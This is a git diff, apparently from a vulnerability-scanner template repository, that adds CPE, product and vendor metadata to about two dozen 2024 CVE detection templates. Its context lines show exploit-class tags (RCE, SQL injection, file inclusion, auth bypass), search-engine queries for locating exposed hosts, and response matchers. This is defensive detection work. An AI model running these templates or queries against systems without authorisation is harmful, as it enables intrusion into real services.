4a0a004730450221008b5117d474664154b7b9b2b8f2c14284599c81fcbe172df27d9793b3b4a8d65602206c4b5689c81e4a2e53e1e5917aa6e6dd97595c1d5a8c1313772ee7aea8d2473d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-29868.yaml b/http/cves/2024/CVE-2024-29868.yaml index b48608aab9..142797fa95 100644 --- a/http/cves/2024/CVE-2024-29868.yaml +++ b/http/cves/2024/CVE-2024-29868.yaml @@ -18,10 +18,13 @@ info: classification: cve-id: CVE-2024-29868 cwe-id: CWE-338 + cpe: cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"apache streampipes" fofa-query: title="apache streampipes" + product: streampipes + vendor: apache tags: cve,cve2024,apache,streampipes,account-takeover flow: http(1) && http(2) @@ -63,4 +66,4 @@ http: - 'contains(settings, true)' - "compare_versions(version, '>= 0.69.0') && compare_versions(version, '<= 0.93.0')" condition: and -# digest: 4a0a00473045022069750485c9d5e0f84f79ab49d9fa0e4a4f8c28e1d224257f2259524911fe7426022100cabd7a2903691f609ccd758c7bfe7273a823f2af6d0543cc8a2c68c3c477da5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022069750485c9d5e0f84f79ab49d9fa0e4a4f8c28e1d224257f2259524911fe7426022100cabd7a2903691f609ccd758c7bfe7273a823f2af6d0543cc8a2c68c3c477da5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index d77f57b538..3fdde91046 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -21,10 +21,13 @@ info: cve-id: CVE-2024-3136 epss-score: 0.00065 epss-percentile: 0.28259 + cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" + product: masterstudy_lms + vendor: stylemixthemes tags: cve,cve2024,wp,wordpress,unauth,lfi variables: randomstr: "{{randstr_1}}" @@ -59,4 +62,4 @@ http: group: 1 internal: true name: nonce -# digest: 4a0a0047304502202b763dd72807cc252360a0934574e10db71e534d2dcb99664ef0d64f8e8a248002210097d5a1eaeb56e1c3c6b1f836e5c15a210596a30c9af148de0c5ee5b15b9e927f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b763dd72807cc252360a0934574e10db71e534d2dcb99664ef0d64f8e8a248002210097d5a1eaeb56e1c3c6b1f836e5c15a210596a30c9af148de0c5ee5b15b9e927f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index 9517843e15..d326f371e4 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -17,10 +17,13 @@ info: cwe-id: CWE-22 epss-score: 0.00053 epss-percentile: 0.21091 + cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: "title:\"CData Arc\"" + product: arc + vendor: cdata tags: cve,cve2024,cdata,lfi flow: http(1) && http(2) @@ -59,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008bbf300b0ea549282dc1258f3c481521e094057630ded471600235926cfb8aad022043e0add2cc98eeefeaed68b619c6ec62bd46e6d640ae65e66f49a5431c5fde93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bbf300b0ea549282dc1258f3c481521e094057630ded471600235926cfb8aad022043e0add2cc98eeefeaed68b619c6ec62bd46e6d640ae65e66f49a5431c5fde93:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-32113.yaml b/http/cves/2024/CVE-2024-32113.yaml index 52e7b6c50c..498ff984da 100644 --- a/http/cves/2024/CVE-2024-32113.yaml +++ b/http/cves/2024/CVE-2024-32113.yaml @@ -19,10 +19,13 @@ info: cve-id: CVE-2024-32113 epss-score: 0.00115 epss-percentile: 0.45112 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="Apache_OFBiz" + product: ofbiz + vendor: apache tags: cve,cve2024,apache,obiz,rce http: @@ -46,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b88041381f7eeda038aa86589d4e8abaa41ddf477aafea6cd9271bdafa02ebb6022100dfb966a119b54853c7b4d4ea44205600d7bf2227910f32cd964a08a2cf91571d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b88041381f7eeda038aa86589d4e8abaa41ddf477aafea6cd9271bdafa02ebb6022100dfb966a119b54853c7b4d4ea44205600d7bf2227910f32cd964a08a2cf91571d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 403d19dac2..ad92612c34 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -15,10 +15,13 @@ info: classification: epss-score: 0.00053 epss-percentile: 0.21091 + cpe: cpe:2.3:a:raidenmaild:raidenmaild:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"RaidenMAILD" + product: raidenmaild + vendor: raidenmaild tags: cve,cve2024,lfi,raiden,mail,server http: @@ -33,4 +36,4 @@ http: - 'contains(header, "application/octet-stream")' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100a4e4fec406f9745a3ec5ab8ef88a44a13b351b1b3c8a4148416cf83776e7632c022100a63559fdc8153e058c817e01043c453e8af311de120d56c15030608f4b5c5598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4e4fec406f9745a3ec5ab8ef88a44a13b351b1b3c8a4148416cf83776e7632c022100a63559fdc8153e058c817e01043c453e8af311de120d56c15030608f4b5c5598:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index 01d5767542..10e342f93b 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -18,10 +18,13 @@ info: cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.0866 + cpe: cpe:2.3:a:plechevandrey:wp-recall:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/wp-recall/" + product: wp-recall + vendor: plechevandrey tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli variables: @@ -43,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220133ca9cf2f1029c377a0637602b2f99279abe7bbcad1da1f3e66733f6563d26e02207da0cf317afc9c589b8a2c4e7551e7613d75b026f1d89f2fd06642435a38b96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220133ca9cf2f1029c377a0637602b2f99279abe7bbcad1da1f3e66733f6563d26e02207da0cf317afc9c589b8a2c4e7551e7613d75b026f1d89f2fd06642435a38b96f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-3274.yaml b/http/cves/2024/CVE-2024-3274.yaml index 4d3059dfb5..b6bdfaa367 100644 --- a/http/cves/2024/CVE-2024-3274.yaml +++ b/http/cves/2024/CVE-2024-3274.yaml @@ -17,10 +17,13 @@ info: cwe-id: CWE-200 epss-score: 0.00045 epss-percentile: 0.15047 + cpe: cpe:2.3:h:dlink:dns-320l:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: body="Text:In order to access the ShareCenter" + product: dns-320l + vendor: dlink tags: cve,cve2024,dlink,exposure http: @@ -35,4 +38,4 @@ http: - 'contains_all(body, "Model=", "Build=", "Macaddr=")' - 'status_code == 200' condition: and -# digest: 490a004630440220637a70951ffd4c3d81671b37a51e678c922a409e791bdbb538ad6cce7bb84fad0220303256e098c2a99c41e54b1518da46ac7d1910401c97102c6afaa5f2490973d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220637a70951ffd4c3d81671b37a51e678c922a409e791bdbb538ad6cce7bb84fad0220303256e098c2a99c41e54b1518da46ac7d1910401c97102c6afaa5f2490973d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-33113.yaml b/http/cves/2024/CVE-2024-33113.yaml index 1b76a9b005..1abe59d732 100644 --- a/http/cves/2024/CVE-2024-33113.yaml +++ b/http/cves/2024/CVE-2024-33113.yaml @@ -12,10 +12,13 @@ info: classification: epss-score: 0.00043 epss-percentile: 0.0866 + cpe: cpe:2.3:h:dlink:dir-845l:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: "DIR-845L" + product: dir-845l + vendor: dlink tags: cve,cve2024,dlink,info-leak http: @@ -35,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec87c2ac5ca4f20e03f4124ceff0813f7c2781c40386a2e175833a94317fecfc0221008e60c37e890f1d57fc8e3ecaf060276b1800e9eefe727ed8c6713f027166613d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec87c2ac5ca4f20e03f4124ceff0813f7c2781c40386a2e175833a94317fecfc0221008e60c37e890f1d57fc8e3ecaf060276b1800e9eefe727ed8c6713f027166613d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index e21a1bf426..9cb156a0bd 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 2 shodan-query: title:"Prison Management System" + product: prison_management_system + vendor: prison_management_system_project tags: cve,cve2024,cms,sqli + classification: + cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:* http: - raw: - | @@ -40,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-33605.yaml b/http/cves/2024/CVE-2024-33605.yaml index 35865304bc..a28d917364 100644 --- a/http/cves/2024/CVE-2024-33605.yaml +++ b/http/cves/2024/CVE-2024-33605.yaml @@ -17,10 +17,13 @@ info: cvss-score: 7.5 cve-id: CVE-2024-33605 cwe-id: CWE-22 + cpe: cpe:2.3:o:sharp:mx-3550v_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: "Set-Cookie: MFPSESSIONID=" + product: mx-3550v_firmware + vendor: sharp tags: cve,cve2024,sharp,printer,traversal http: @@ -45,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c5b2cbe816dd280d1fd71f4b2e8e9daa71993e7412bbc86d52ca19d19223684202202d01ae415d5fd8c3758945e17036e3d319cb90bac3eccf633c9f337e91b77272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c5b2cbe816dd280d1fd71f4b2e8e9daa71993e7412bbc86d52ca19d19223684202202d01ae415d5fd8c3758945e17036e3d319cb90bac3eccf633c9f337e91b77272:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index 01082a499a..3425ecc734 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -14,10 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2024-34102 cwe-id: CWE-611 + cpe: cpe:2.3:a:adobe:magento:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="Adobe-Magento" + product: magento + vendor: adobe tags: cve,cve2024,adobe,magento,xxe http: @@ -37,4 +40,4 @@ http: - 'contains_any(body, "log file", "cartId", "no Route")' - 'contains(body, "message")' condition: and -# digest: 490a00463044022035eed0094dc5d29ccf8a1f92e54752fe27ed32cfb86432cf5fcfe0d49475e64702205f85521b014b47759d272853294a0865ed415e31e84c52f04f30236409676efe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035eed0094dc5d29ccf8a1f92e54752fe27ed32cfb86432cf5fcfe0d49475e64702205f85521b014b47759d272853294a0865ed415e31e84c52f04f30236409676efe:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml index 7a5b254b59..604a8996da 100644 --- a/http/cves/2024/CVE-2024-34982.yaml +++ b/http/cves/2024/CVE-2024-34982.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 fofa-query: icon_hash="-282504889" + product: lylme_spage + vendor: lylme tags: cve,cve2024,lylme-spage,rce,intrusive + classification: + cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:* flow: http(1) && http(2) variables: @@ -69,4 +73,4 @@ http: - 'contains(body, "{{string}}" )' - 'contains(header, "text/html")' condition: and -# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index 58f2de36c3..3428af8a7a 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/web-directory-free" + product: web_directory_free + vendor: salephpscripts tags: cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free + classification: + cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:* flow: http(1) && http(2) http: @@ -47,4 +51,4 @@ http: - 'status_code == 200' - regex('^\[\]$', body) condition: and -# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f1531596b6325ac2d986cd6245136e53aa97e8a3978b6a394bffeb78042691602210093b20af969ed64d70d37d6bcea2a4ea4e185ec3d9814c49ec0e4ed34262d6ba6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-36104.yaml b/http/cves/2024/CVE-2024-36104.yaml index 1fa51535d9..88c0afa115 100644 --- a/http/cves/2024/CVE-2024-36104.yaml +++ b/http/cves/2024/CVE-2024-36104.yaml @@ -19,10 +19,13 @@ info: cwe-id: CWE-22 epss-score: 0.00045 epss-percentile: 0.16306 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="Apache_OFBiz" + product: ofbiz + vendor: apache tags: cve,cve2024,apache,obiz,lfi http: @@ -49,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a7361b834830c3e7e20303ae457a8bfcfb5a839bc66596f1a477ccea42cd64f6022038ae35240f2b58a8bd83b199b3111f48d422267b67eac6cafa5f2b5241ef27b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7361b834830c3e7e20303ae457a8bfcfb5a839bc66596f1a477ccea42cd64f6022038ae35240f2b58a8bd83b199b3111f48d422267b67eac6cafa5f2b5241ef27b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml index b51c4c7412..85a5d0386f 100644 --- a/http/cves/2024/CVE-2024-36837.yaml +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: title="CRMEB" + product: crmeb + vendor: crmeb tags: cve,cve2024,crmeb,sqli + classification: + cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:* variables: num: "{{rand_int(9000000, 9999999)}}" @@ -40,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-37032.yaml b/http/cves/2024/CVE-2024-37032.yaml index a162eaa8b8..02b3acd935 100644 --- a/http/cves/2024/CVE-2024-37032.yaml +++ b/http/cves/2024/CVE-2024-37032.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 shodan-query: ollama + product: ollama + vendor: ollama tags: cve,cve2024,ollama,rce + classification: + cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:* http: - raw: - | @@ -38,4 +42,4 @@ http: - contains(interactsh_protocol, 'http') - contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest') condition: and -# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5fa33a756b90484a6e38030d236f0441e68f5e0568a583ecbce5ccc179ec12e022067ed5562eb8a263a887821208641b1c7337d73b10359302495c184e4d1145db2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-37152.yaml b/http/cves/2024/CVE-2024-37152.yaml index c23c7027d3..4cc612cff9 100644 --- a/http/cves/2024/CVE-2024-37152.yaml +++ b/http/cves/2024/CVE-2024-37152.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: html:"Argo CD" + product: argo_cd + vendor: argoproj tags: cve,cve2024,argo-cd,info-leak + classification: + cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:* http: - raw: - | @@ -38,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff51e4d4de0176d7b75272c7382661952fa7f28124b1a6113d2d52675ba7d7ca022100dc729bfc997db746bf206fe0a1ae9ef36b3af92ebad27d690c90a41b636944aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-38288.yaml b/http/cves/2024/CVE-2024-38288.yaml index 48c080aef5..df089f19b5 100644 --- a/http/cves/2024/CVE-2024-38288.yaml +++ b/http/cves/2024/CVE-2024-38288.yaml @@ -12,10 +12,13 @@ info: classification: epss-score: 0.00043 epss-percentile: 0.09357 + cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"TurboMeeting" + product: turbomeeting + vendor: rhubcom tags: cve,cve2024,rce,turbomeeting,authenticated variables: @@ -71,4 +74,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "dns" -# digest: 490a004630440220203de4258c77f0b3f46006707f45d197100eab841ddda3976bf550870b81c67d02205b75ab453b0008ab9bcc928e6784877017f3814bbaa8e6cf840548b94623316b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220203de4258c77f0b3f46006707f45d197100eab841ddda3976bf550870b81c67d02205b75ab453b0008ab9bcc928e6784877017f3814bbaa8e6cf840548b94623316b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-38289.yaml b/http/cves/2024/CVE-2024-38289.yaml index 49c228bc3a..0884307817 100644 --- a/http/cves/2024/CVE-2024-38289.yaml +++ b/http/cves/2024/CVE-2024-38289.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: html:"TurboMeeting" + product: turbomeeting + vendor: rhubcom tags: cve,cve2024,sqli,turbomeeting + classification: + cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:* http: - raw: - | @@ -41,4 +45,4 @@ http: part: body_2 words: - '<__Status__>FAILED' -# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-38856.yaml b/http/cves/2024/CVE-2024-38856.yaml index 9941027675..a465f52572 100644 --- a/http/cves/2024/CVE-2024-38856.yaml +++ b/http/cves/2024/CVE-2024-38856.yaml @@ -15,10 +15,13 @@ info: classification: epss-score: 0.00045 epss-percentile: 0.16306 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="Apache_OFBiz" + product: ofbiz + vendor: apache tags: cve,cve2024,ofbiz,apache,rce,kev http: @@ -45,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f35bcc3e276d91d4e1a05964d5c2544dded6826a8fb086b21e982b01c50548e02201954774503527bdb87c96c2d208ce0bbe1383893272f091ffcef7b5f14e74a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f35bcc3e276d91d4e1a05964d5c2544dded6826a8fb086b21e982b01c50548e02201954774503527bdb87c96c2d208ce0bbe1383893272f091ffcef7b5f14e74a5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index d5536e34d0..85c348beff 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -17,8 +17,12 @@ info: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/dokan-pro/" + product: dokan + vendor: wedevs tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli + classification: + cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:* flow: http(1) && http(2) http: @@ -47,4 +51,4 @@ http: - 'duration>=6' - 'status_code == 302' condition: and -# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dddd0ec4841ea543e8407a98030b788b48c7c9ed9dd3effa76716f9339223b8a022076cb03daa28b52dab09d0014ed45363b0db7d14951be1ec39218c42cc49ee34f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-39907.yaml b/http/cves/2024/CVE-2024-39907.yaml index b0d3b12ee9..638970d134 100644 --- a/http/cves/2024/CVE-2024-39907.yaml +++ b/http/cves/2024/CVE-2024-39907.yaml @@ -15,10 +15,13 @@ info: cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.09387 + cpe: cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA" + product: 1panel + vendor: fit2cloud tags: cve,cve2024,sqli,1panel,authenticated variables: @@ -49,4 +52,4 @@ http: - contains_all(body_2, "SQL logic error","table exp already exists") - contains(header_1, 'psession') condition: and -# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-41107.yaml b/http/cves/2024/CVE-2024-41107.yaml index f4a9def750..ce7e6dfe50 100644 --- a/http/cves/2024/CVE-2024-41107.yaml +++ b/http/cves/2024/CVE-2024-41107.yaml @@ -15,10 +15,13 @@ info: classification: epss-score: 0.00046 epss-percentile: 0.16798 + cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="APACHE-CloudStack" + product: cloudstack + vendor: apache tags: cve,cve2024,apache,cloudstack,auth-bypass variables: @@ -44,4 +47,4 @@ http: - "contains(content_type,'text/xml')" - "status_code==302" condition: and -# digest: 4a0a00473045022100bba4f9d8bd13d7f88a72d393233b2bf209b17e02fb2ecad69d9fba3e6177cb180220391703c38491fdb8803df18e2a2e06720d705bdaf7323909112ca37e6360ef73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bba4f9d8bd13d7f88a72d393233b2bf209b17e02fb2ecad69d9fba3e6177cb180220391703c38491fdb8803df18e2a2e06720d705bdaf7323909112ca37e6360ef73:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-43425.yaml b/http/cves/2024/CVE-2024-43425.yaml index e4c1d825a5..204c7ddc90 100644 --- a/http/cves/2024/CVE-2024-43425.yaml +++ b/http/cves/2024/CVE-2024-43425.yaml @@ -14,10 +14,13 @@ info: classification: cvss-score: 9.8 cve-id: CVE-2024-43425 + cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Moodle" + product: moodle + vendor: moodle tags: cve,cve2024,moodile,rce,authenticated flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) @@ -124,4 +127,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206751ee480090a5e57009256b124a5b385fb35e0ad2c554e3e4e9081f07d433a602205a3c2bb69019ccd312411579022b8f9f0ffff59aebc705f23ef418df865ad97a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206751ee480090a5e57009256b124a5b385fb35e0ad2c554e3e4e9081f07d433a602205a3c2bb69019ccd312411579022b8f9f0ffff59aebc705f23ef418df865ad97a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index 04504f7d8b..6ccf38888e 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -19,10 +19,13 @@ info: cwe-id: CWE-79 epss-score: 0.00065 epss-percentile: 0.28259 + cpe: cpe:2.3:a:oscommerce:oscommerce:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"osCommerce" + product: oscommerce + vendor: oscommerce tags: packetstorm,xss,rxss,oscommerce,cve2024,cve http: @@ -49,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206260c934d288615aaeb670fe5578235b6f88ea430cb576d396053d632dd1dc880220219844f51c66f70e35b91c1c9cebf6a80739618fe718297ec00954bcc77c4dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206260c934d288615aaeb670fe5578235b6f88ea430cb576d396053d632dd1dc880220219844f51c66f70e35b91c1c9cebf6a80739618fe718297ec00954bcc77c4dbc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 9aefadc722..d04b09041b 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -16,7 +16,11 @@ info: verified: true max-request: 2 shodan-query: title:"Log in | Telerik Report Server" + product: telerik_report_server + vendor: progress tags: cve,cve2024,telerik,progress,auth-bypass,instrusive + classification: + cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:* variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" @@ -61,4 +65,4 @@ http: dsl: - '"Username: "+ user' - '"Password: "+ pass' -# digest: 4b0a00483046022100b40c2678a88f956f4c6349fda05d4d83541374a2907b8731a90941505551b493022100f53a3591f5bd4a3fb03698db001d452302dd2217004277971fc01d9af5e9569f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 